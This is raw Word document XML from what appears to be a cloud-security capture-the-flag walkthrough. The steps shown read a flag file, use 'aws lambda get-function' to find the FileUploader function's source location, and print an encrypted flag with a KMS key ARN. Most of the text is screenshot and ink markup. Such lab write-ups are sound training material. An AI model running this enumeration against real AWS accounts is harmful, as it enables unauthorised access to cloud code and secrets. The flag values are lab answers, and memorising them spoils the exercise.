              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251728896" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="67B72CFD" wp14:editId="342808FD">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>81360</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>339185</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1616400" cy="120960"/>
                <wp:effectExtent l="63500" t="101600" r="22225" b="107950"/>
                <wp:wrapNone/>
                <wp:docPr id="292" name="Ink 292"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingInk">
                    <w14:contentPart bwMode="auto" r:id="rId120">
                      <w14:nvContentPartPr>
                        <w14:cNvContentPartPr/>
                      </w14:nvContentPartPr>
                      <w14:xfrm>
                        <a:off x="0" y="0"/>
                        <a:ext cx="1616400" cy="120960"/>
                      </w14:xfrm>
                    </w14:contentPart>
                  </a:graphicData>
                </a:graphic>
              </wp:anchor>
            </w:drawing>
          </mc:Choice>
          <mc:Fallback>
            <w:pict>
              <v:shape w14:anchorId="3925A681" id="Ink 292" o:spid="_x0000_s1026" type="#_x0000_t75" style="position:absolute;margin-left:3.55pt;margin-top:21.05pt;width:132.95pt;height:20.8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">
                <v:imagedata r:id="rId121"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"/var/folders/b3/kyjkq9zj5hjbxs827xg70pc40000gn/T/com.microsoft.Word/WebArchiveCopyPasteTempFiles/page23image66380944" \* MERGEFORMATINET </w:instrText>
      </w:r>
      <w:r w:rsidR="0094232C" w:rsidRPr="0094232C">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="0094232C" w:rsidRPr="0094232C">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3189D969" wp14:editId="3CCDD133">
            <wp:extent cx="5731510" cy="2963545"/>
            <wp:effectExtent l="12700" t="12700" r="8890" b="8255"/>
            <wp:docPr id="104" name="Picture 104" descr="page23image6638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age23image663809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solidFill>
                        <a:schemeClr val="tx1"/>
                      </a:solidFill>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidR="0094232C" w:rsidRPr="0094232C">
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A43E418" w14:textId="3769A61D" w:rsidR="0094232C" w:rsidRPr="0094232C" w:rsidRDefault="0094232C" w:rsidP="0094232C"/>
    <w:p w14:paraId="068A458A" w14:textId="77777777" w:rsidR="00D55784" w:rsidRDefault="0094232C" w:rsidP="0094232C">
      <w:r w:rsidRPr="0094232C">
        <w:t xml:space="preserve">The path of ServerlessFLAG5 is revealed. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FEEBC88" w14:textId="77777777" w:rsidR="00D55784" w:rsidRDefault="00D55784" w:rsidP="0094232C"/>
    <w:p w14:paraId="79A47607" w14:textId="77777777" w:rsidR="00D55784" w:rsidRDefault="0094232C" w:rsidP="00242257">
      <w:pPr>
        <w:pStyle w:val="TOC1"/>
      </w:pPr>
      <w:r w:rsidRPr="0094232C">
        <w:t xml:space="preserve">Step 29: ​Retrieve ServerlessFLAG5 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79925CE2" w14:textId="24C37677" w:rsidR="0094232C" w:rsidRPr="0094232C" w:rsidRDefault="0094232C" w:rsidP="00D55784">
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:sz="4" w:space="1" w:color="auto"/>
          <w:left w:val="single" w:sz="4" w:space="4" w:color="auto"/>
          <w:bottom w:val="single" w:sz="4" w:space="1" w:color="auto"/>
          <w:right w:val="single" w:sz="4" w:space="4" w:color="auto"/>
        </w:pBdr>
        <w:rPr>
          <w:rStyle w:val="HTMLSample"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0094232C">
        <w:rPr>
          <w:rStyle w:val="HTMLSample"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Command: ​cat data/ServerlessFLAG5 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="790768BD" w14:textId="77777777" w:rsidR="00D55784" w:rsidRDefault="0094232C" w:rsidP="0094232C">
      <w:r w:rsidRPr="0094232C">
        <w:t>ServerlessFLAG5: ​0a7b44abc6e76c992614f8acf6244040</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F02528B" w14:textId="3550D4FB" w:rsidR="0094232C" w:rsidRPr="0094232C" w:rsidRDefault="0094232C" w:rsidP="0094232C">
      <w:r w:rsidRPr="0094232C">
        <w:br/>
        <w:t xml:space="preserve">Step 30: ​ServerlessFLAG6 is the version of the package used by </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0094232C">
        <w:t>FileUploader</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0094232C">
        <w:t xml:space="preserve"> Function. Get </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B55843C" w14:textId="77777777" w:rsidR="00D55784" w:rsidRDefault="0094232C" w:rsidP="00242257">
      <w:pPr>
        <w:pStyle w:val="TOC1"/>
      </w:pPr>
      <w:r w:rsidRPr="0094232C">
        <w:t xml:space="preserve">the source code Location of </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0094232C">
        <w:t>FileUploader</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0094232C">
        <w:t xml:space="preserve"> function.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="172595DC" w14:textId="1BCFC61C" w:rsidR="0094232C" w:rsidRPr="0094232C" w:rsidRDefault="0094232C" w:rsidP="00936B3A">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lambda get-function --function-name </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0094232C">
        <w:rPr>
          <w:rStyle w:val="HTMLSample"/>
        </w:rPr>
        <w:t>FileUploader</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0094232C">
        <w:rPr>
          <w:rStyle w:val="HTMLSample"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7109A857" w14:textId="77777777" w:rsidR="009C6E68" w:rsidRDefault="009C6E68" w:rsidP="0094232C"/>
    <w:p w14:paraId="17F2DA0A" w14:textId="7EAA9456" w:rsidR="0094232C" w:rsidRPr="0094232C" w:rsidRDefault="009C6E68" w:rsidP="0094232C">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wpi">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251705344" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="3F77B93D" wp14:editId="0EA0EACA">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>124920</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>1942674</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="5463360" cy="88200"/>
                <wp:effectExtent l="127000" t="215900" r="150495" b="217170"/>
                <wp:wrapNone/>
                <wp:docPr id="267" name="Ink 267"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingInk">
                    <w14:contentPart bwMode="auto" r:id="rId123">
                      <w14:nvContentPartPr>
                        <w14:cNvContentPartPr/>
                      </w14:nvContentPartPr>
                      <w14:xfrm>
                        <a:off x="0" y="0"/>
                        <a:ext cx="5463360" cy="88200"/>
                      </w14:xfrm>
                    </w14:contentPart>
                  </a:graphicData>
                </a:graphic>
              </wp:anchor>
            </w:drawing>
          </mc:Choice>
          <mc:Fallback>
            <w:pict>
              <v:shape w14:anchorId="58D326C3" id="Ink 267" o:spid="_x0000_s1026" type="#_x0000_t75" style="position:absolute;margin-left:2.75pt;margin-top:138.8pt;width:444.4pt;height:35.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">
                <v:imagedata r:id="rId124"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"/var/folders/b3/kyjkq9zj5hjbxs827xg70pc40000gn/T/com.microsoft.Word/WebArchiveCopyPasteTempFiles/page24image66408512" \* MERGEFORMATINET </w:instrText>
      </w:r>
      <w:r w:rsidR="0094232C" w:rsidRPr="0094232C">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="0094232C" w:rsidRPr="0094232C">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5E3B35C4" wp14:editId="6D6D8C3C">
            <wp:extent cx="5731510" cy="2785745"/>
            <wp:effectExtent l="12700" t="12700" r="8890" b="8255"/>
            <wp:docPr id="100" name="Picture 100" descr="page24image6640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ge24image664085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785745"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:solidFill>
                        <a:schemeClr val="tx1"/>
                      </a:solidFill>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidR="0094232C" w:rsidRPr="0094232C">
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AA35F30" w14:textId="1B1A676E" w:rsidR="0094232C" w:rsidRPr="0094232C" w:rsidRDefault="00B9596B" w:rsidP="0094232C">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wpi">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251729920" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="5EFE9F9B" wp14:editId="6DAD8098">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>3403800</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>493568</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1122840" cy="8280"/>
                <wp:effectExtent l="88900" t="139700" r="83820" b="144145"/>
                <wp:wrapNone/>
                <wp:docPr id="293" name="Ink 293"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingInk">
                    <w14:contentPart bwMode="auto" r:id="rId126">
                      <w14:nvContentPartPr>
                        <w14:cNvContentPartPr/>
                      </w14:nvContentPartPr>
                      <w14:xfrm>
                        <a:off x="0" y="0"/>
                        <a:ext cx="1122840" cy="8280"/>
                      </w14:xfrm>
                    </w14:contentPart>
                  </a:graphicData>
                </a:graphic>
              </wp:anchor>
            </w:drawing>
          </mc:Choice>
          <mc:Fallback>
            <w:pict>
              <v:shape w14:anchorId="06CE7418" id="Ink 293" o:spid="_x0000_s1026" type="#_x0000_t75" style="position:absolute;margin-left:263.75pt;margin-top:30.35pt;width:96.9pt;height:17.6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">
                <v:imagedata r:id="rId127" o:title=""/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="009C6E68">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wpi">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251710464" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="0EBEA72D" wp14:editId="47EC101A">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>1276560</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>2010842</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1883880" cy="38880"/>
                <wp:effectExtent l="127000" t="215900" r="135890" b="215265"/>
                <wp:wrapNone/>
                <wp:docPr id="272" name="Ink 272"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingInk">
                    <w14:contentPart bwMode="auto" r:id="rId128">
                      <w14:nvContentPartPr>
                        <w14:cNvContentPartPr/>
                      </w14:nvContentPartPr>
                      <w14:xfrm>
                        <a:off x="0" y="0"/>
                        <a:ext cx="1883880" cy="38880"/>
                      </w14:xfrm>
                    </w14:contentPart>
                  </a:graphicData>
                </a:graphic>
              </wp:anchor>
            </w:drawing>
          </mc:Choice>
          <mc:Fallback>
            <w:pict>
              <v:shape w14:anchorId="458FC659" id="Ink 272" o:spid="_x0000_s1026" type="#_x0000_t75" style="position:absolute;margin-left:93.45pt;margin-top:144.2pt;width:162.55pt;height:31.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">
                <v:imagedata r:id="rId129" o:title=""/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="009C6E68">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wpi">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251709440" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="61F2C9EF" wp14:editId="3DABC88A">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>105480</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>2064842</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="5581800" cy="134280"/>
                <wp:effectExtent l="127000" t="215900" r="120650" b="208915"/>
                <wp:wrapNone/>
                <wp:docPr id="271" name="Ink 271"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingInk">
                    <w14:contentPart bwMode="auto" r:id="rId130">
                      <w14:nvContentPartPr>
                        <w14:cNvContentPartPr/>
                      </w14:nvContentPartPr>
                      <w14:xfrm>
                        <a:off x="0" y="0"/>
                        <a:ext cx="5581800" cy="134280"/>
                      </w14:xfrm>
                    </w14:contentPart>
                  </a:graphicData>
                </a:graphic>
              </wp:anchor>
            </w:drawing>
          </mc:Choice>
          <mc:Fallback>
            <w:pict>
              <v:shape w14:anchorId="352B8851" id="Ink 271" o:spid="_x0000_s1026" type="#_x0000_t75" style="position:absolute;margin-left:1.2pt;margin-top:148.45pt;width:453.65pt;height:38.9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">
                <v:imagedata r:id="rId131" o:title=""/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="009C6E68">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wpi">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251708416" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="20DE6A40" wp14:editId="201699DF">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>81720</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>1743362</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="5596200" cy="96120"/>
                <wp:effectExtent l="127000" t="215900" r="144780" b="208915"/>
                <wp:wrapNone/>
                <wp:docPr id="270" name="Ink 270"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingInk">
                    <w14:contentPart bwMode="auto" r:id="rId132">
                      <w14:nvContentPartPr>
                        <w14:cNvContentPartPr/>
                      </w14:nvContentPartPr>
                      <w14:xfrm>
                        <a:off x="0" y="0"/>
                        <a:ext cx="5596200" cy="96120"/>
                      </w14:xfrm>
                    </w14:contentPart>
                  </a:graphicData>
                </a:graphic>
              </wp:anchor>
            </w:drawing>
          </mc:Choice>
          <mc:Fallback>
            <w:pict>
              <v:shape w14:anchorId="2DEF21EE" id="Ink 270" o:spid="_x0000_s1026" type="#_x0000_t75" style="position:absolute;margin-left:-.6pt;margin-top:123.1pt;width:454.85pt;height:35.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">
                <v:imagedata r:id="rId133" o:title=""/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="009C6E68">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wpi">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251707392" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="14564A90" wp14:editId="73FB7DED">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>105120</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>2410802</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="5543640" cy="90720"/>
                <wp:effectExtent l="127000" t="215900" r="120650" b="214630"/>
                <wp:wrapNone/>
                <wp:docPr id="269" name="Ink 269"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingInk">
                    <w14:contentPart bwMode="auto" r:id="rId134">
                      <w14:nvContentPartPr>
                        <w14:cNvContentPartPr/>
                      </w14:nvContentPartPr>
                      <w14:xfrm>
                        <a:off x="0" y="0"/>
                        <a:ext cx="5543640" cy="90720"/>
                      </w14:xfrm>
                    </w14:contentPart>
                  </a:graphicData>
                </a:graphic>
              </wp:anchor>
            </w:drawing>
          </mc:Choice>
          <mc:Fallback>
            <w:pict>
              <v:shape w14:anchorId="02D2CDB2" id="Ink 269" o:spid="_x0000_s1026" type="#_x0000_t75" style="position:absolute;margin-left:1.25pt;margin-top:175.7pt;width:450.65pt;height:3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">
                <v:imagedata r:id="rId135" o:title=""/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="009C6E68">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wpi">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251706368" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="4850B962" wp14:editId="597A9FA0">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>108360</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>1451402</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="5526720" cy="45720"/>
                <wp:effectExtent l="127000" t="215900" r="150495" b="208280"/>
                <wp:wrapNone/>
                <wp:docPr id="268" name="Ink 268"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingInk">
                    <w14:contentPart bwMode="auto" r:id="rId136">
                      <w14:nvContentPartPr>
                        <w14:cNvContentPartPr/>
                      </w14:nvContentPartPr>
                      <w14:xfrm>
                        <a:off x="0" y="0"/>
                        <a:ext cx="5526720" cy="45720"/>
                      </w14:xfrm>
                    </w14:contentPart>
                  </a:graphicData>
                </a:graphic>
              </wp:anchor>
            </w:drawing>
          </mc:Choice>
          <mc:Fallback>
            <w:pict>
              <v:shape w14:anchorId="13016004" id="Ink 268" o:spid="_x0000_s1026" type="#_x0000_t75" style="position:absolute;margin-left:1.5pt;margin-top:100.15pt;width:449.3pt;height:31.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">
                <v:imagedata r:id="rId137"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"/var/folders/b3/kyjkq9zj5hjbxs827xg70pc40000gn/T/com.microsoft.Word/WebArchiveCopyPasteTempFiles/page25image66407264" \* MERGEFORMATINET </w:instrText>
      </w:r>
      <w:r w:rsidR="0094232C" w:rsidRPr="0094232C">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="0094232C" w:rsidRPr="0094232C">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="12F83D54" wp14:editId="3A577439">
            <wp:extent cx="5731510" cy="3030855"/>
            <wp:effectExtent l="12700" t="12700" r="8890" b="17145"/>
            <wp:docPr id="97" name="Picture 97" descr="page25image6640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ge25image6640726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a:solidFill>
                        <a:schemeClr val="tx1"/>
                      </a:solidFill>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidR="0094232C" w:rsidRPr="0094232C">
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="48879F0F" w14:textId="642DB865" w:rsidR="0094232C" w:rsidRPr="0094232C" w:rsidRDefault="0094232C" w:rsidP="0094232C">
      <w:r w:rsidRPr="0094232C">
        <w:t xml:space="preserve">The </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0094232C">
        <w:t>FileUploader</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0094232C">
        <w:t xml:space="preserve"> function is dependent upon version 4 of </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0094232C">
        <w:t>FileUploaderLayer</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0094232C">
        <w:t xml:space="preserve"> layer. The Link to download the source code is present in the Location Attribute. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0946DD75" w14:textId="77777777" w:rsidR="009C6E68" w:rsidRDefault="009C6E68" w:rsidP="0094232C"/>
    <w:p w14:paraId="15EDEE80" w14:textId="48128360" w:rsidR="0094232C" w:rsidRPr="0094232C" w:rsidRDefault="0094232C" w:rsidP="009C6E68">
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:sz="4" w:space="1" w:color="auto"/>
          <w:left w:val="single" w:sz="4" w:space="4" w:color="auto"/>
          <w:bottom w:val="single" w:sz="4" w:space="1" w:color="auto"/>
          <w:right w:val="single" w:sz="4" w:space="4" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="0094232C">
        <w:t xml:space="preserve">Encrypted ServerlessFLAG7: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63E35520" w14:textId="77777777" w:rsidR="0094232C" w:rsidRPr="0094232C" w:rsidRDefault="0094232C" w:rsidP="009C6E68">
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:sz="4" w:space="1" w:color="auto"/>
          <w:left w:val="single" w:sz="4" w:space="4" w:color="auto"/>
          <w:bottom w:val="single" w:sz="4" w:space="1" w:color="auto"/>
          <w:right w:val="single" w:sz="4" w:space="4" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="0094232C">
        <w:t xml:space="preserve">AQICAHi7+9ngknhMkz0sb+LYfPQqw3Oupegu4Y5dqgMw9JThIQEsuEXoJgp7K5CCZmy4DGH aAAAAfjB8BgkqhkiG9w0BBwagbzBtAgEAMGgGCSqGSIb3DQEHATAeBglghkgBZQMEAS4wE QQMdjbjfhorKb6HMIG4AgEQgDuwWQVNClcMu1GQgZdJUj/RG/4vaFEdT8wfRKWEWTZz84O M443vrn41/Qy5qypysm+3729SJ7sCjOfuGg== </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2345A869" w14:textId="77777777" w:rsidR="0094232C" w:rsidRPr="0094232C" w:rsidRDefault="0094232C" w:rsidP="009C6E68">
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:sz="4" w:space="1" w:color="auto"/>
          <w:left w:val="single" w:sz="4" w:space="4" w:color="auto"/>
          <w:bottom w:val="single" w:sz="4" w:space="1" w:color="auto"/>
          <w:right w:val="single" w:sz="4" w:space="4" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="0094232C">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">KMS ARN: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="425A7A51" w14:textId="77777777" w:rsidR="0094232C" w:rsidRPr="0094232C" w:rsidRDefault="0094232C" w:rsidP="009C6E68">
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:sz="4" w:space="1" w:color="auto"/>
          <w:left w:val="single" w:sz="4" w:space="4" w:color="auto"/>
          <w:bottom w:val="single" w:sz="4" w:space="1" w:color="auto"/>
          <w:right w:val="single" w:sz="4" w:space="4" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="0094232C">
        <w:t xml:space="preserve">arn:aws:kms:ap-southeast-1:276384657722:key/42ff3c24-70f3-42bd-96db-d69792ec1b37 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1668DFD7" w14:textId="6A67950D" w:rsidR="0094232C" w:rsidRPr="0094232C" w:rsidRDefault="0094232C" w:rsidP="00242257">
      <w:pPr>
        <w:pStyle w:val="TOC1"/>
      </w:pPr>
      <w:r w:rsidRPr="0094232C">
        <w:t xml:space="preserve">Step 31: ​Download the source archive. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="505FEC55" w14:textId="77777777" w:rsidR="0094232C" w:rsidRPr="0094232C" w:rsidRDefault="0094232C" w:rsidP="00242257">
      <w:pPr>
        <w:pStyle w:val="TOC1"/>
      </w:pPr>
      <w:r w:rsidRPr="0094232C">
        <w:t xml:space="preserve">Step 32: ​Extract the archive. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="184EE66E" w14:textId="5A1E6032" w:rsidR="0094232C" w:rsidRPr="0094232C" w:rsidRDefault="0094232C" w:rsidP="0094232C">
      <w:r w:rsidRPr="0094232C">
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="0094232C">
        <w:instrText xml:space="preserve"> INCLUDEPICTURE "/var/folders/b3/kyjkq9zj5hjbxs827xg70pc40000gn/T/com.microsoft.Word/WebArchiveCopyPasteTempFiles/page26image66415168" \* MERGEFORMATINET </w:instrText>
      </w:r>
      <w:r w:rsidRPr="0094232C">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidRPr="0094232C">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6E54407F" wp14:editId="5494D727">
            <wp:extent cx="5731510" cy="2162810"/>
            <wp:effectExtent l="12700" t="12700" r="8890" b="8890"/>
            <wp:docPr id="93" name="Picture 93" descr="page26image664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ge26image6641516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162810"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:solidFill>
                        <a:schemeClr val="tx1"/>
                      </a:solidFill>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidRPr="0094232C">
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="25EACC46" w14:textId="59E24FDB" w:rsidR="0094232C" w:rsidRPr="0094232C" w:rsidRDefault="0094232C" w:rsidP="0094232C">
      <w:r w:rsidRPr="0094232C">
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="0094232C">
        <w:instrText xml:space="preserve"> INCLUDEPICTURE "/var/folders/b3/kyjkq9zj5hjbxs827xg70pc40000gn/T/com.microsoft.Word/WebArchiveCopyPasteTempFiles/page27image66418704" \* MERGEFORMATINET </w:instrText>
      </w:r>
      <w:r w:rsidRPr="0094232C">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidRPr="0094232C">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="43222C02" wp14:editId="6B4BDDDD">
            <wp:extent cx="5731510" cy="2211070"/>
            <wp:effectExtent l="12700" t="12700" r="8890" b="11430"/>
            <wp:docPr id="90" name="Picture 90" descr="page27image6641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age27image6641870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211070"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:solidFill>
                        <a:schemeClr val="tx1"/>
                      </a:solidFill>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidRPr="0094232C">
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="56469093" w14:textId="77777777" w:rsidR="009C6E68" w:rsidRDefault="009C6E68" w:rsidP="0094232C"/>
